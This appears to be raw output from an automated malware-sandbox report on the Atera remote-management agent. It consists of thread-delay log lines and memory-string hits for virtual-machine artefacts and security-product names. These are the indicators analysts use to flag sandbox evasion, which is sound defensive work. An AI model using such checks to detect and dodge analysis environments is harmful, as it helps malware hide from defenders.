                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599756
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599610
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599490
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599136
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599016
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598906
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598789
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598453
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598340
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598216
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598107
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597985
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597735
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597610
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597244
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597130
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596781
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596449
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596215
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596098
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595969
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595747
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595637
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595464
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595356
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595225
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595106
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594993
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594764
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594641
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594531
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594419
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594297
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594188
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594075
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593953
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593844
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593732
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599812
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599685
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599574
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599249
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599140
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599011
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598882
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598731
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598624
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598504
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598390
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598281
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598138
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598015
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597848
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597734
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597621
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597515
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597403
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597294
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597187
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597075
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596960
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596852
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596745
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596627
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596513
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596404
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596296
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596187
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596067
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595909
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595530
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595380
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595265
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595156
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595046
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594934
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594668
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594531
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594165
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593843
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593719
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593451
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593334
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593206
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593077
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592959
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592829
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 7200000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 7199859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.Messages.dll
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service0
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2773671351.0000029E3A420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                                Source: svchost.exe, 00000029.00000002.3061852098.00000111EEC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0VMware
                                Source: svchost.exe, 00000029.00000002.3061730811.00000111EEC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0i
                                Source: AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`~F[
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 6VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceSynchronizes the system time of this virtual machine with the system time of the physical computer.Hyper-V Time Synchronization ServicevmictimesyncStopped
                                Source: svchost.exe, 00000029.00000002.3061685112.00000111EEC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C2942FCE4D06663969F532E45D1A0VMwareVirtual diskD
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2392765473.00000281D69D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2400052664.00000281D6A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicheartbeatvmicheartbeatStoppedU+
                                Source: svchost.exe, 00000029.00000002.3061852098.00000111EEC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C2942FCE4D06663969F532E45D1A
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FF2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2861314309.0000022052F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: AgentPackageProgramManagement.exe, 00000031.00000000.2383010410.00000153FCB72000.00000002.00000001.01000000.0000002B.sdmpBinary or memory string: VMware Tools)Cisco Webex Meetings
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdownD^
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2773671351.0000029E3A420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Inc.NoneVMware
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                                Source: svchost.exe, 00000029.00000002.3061852098.00000111EEC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2861314309.0000022052F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                                Source: svchost.exe, 00000029.00000002.3062836858.00000111EF123000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD910000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1983167584.000002156BA8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2384808398.00000281D6995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicvssvmicvssStoppedN;i
                                Source: AgentPackageAgentInformation.exe, 00000015.00000002.1985299370.0000015E7E0C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
                                Source: AgentPackageAgentInformation.exe, 00000014.00000000.1961278345.000002156B882000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: VIRUSfighterAVMware Carbon Black Cloud Sensor7VMware Carbon Black Defense/VMware Carbon Black EDR9VMware Carbon Black Response
                                Source: svchost.exe, 00000029.00000002.3061852098.00000111EEC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C2942FCE4D06663969F532E45D1A
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service0
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicshutdownvmicshutdownStopped
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                                Source: Atera.AgentPackages.CommonLib.dll2.26.drBinary or memory string: vmware
                                Source: svchost.exe, 00000029.00000002.3061799701.00000111EEC42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JSetPropValue.Manufacturer("VMware");
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Hyper-V PowerShell Direct ServicevmicvmsessionStopped$A
                                Source: svchost.exe, 00000029.00000002.3062318900.00000111EECD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@friendlyname"vmware virtual disk"OCALE
                                Source: rundll32.exe, 00000010.00000002.1806232936.0000000002F66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2384808398.00000281D6995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
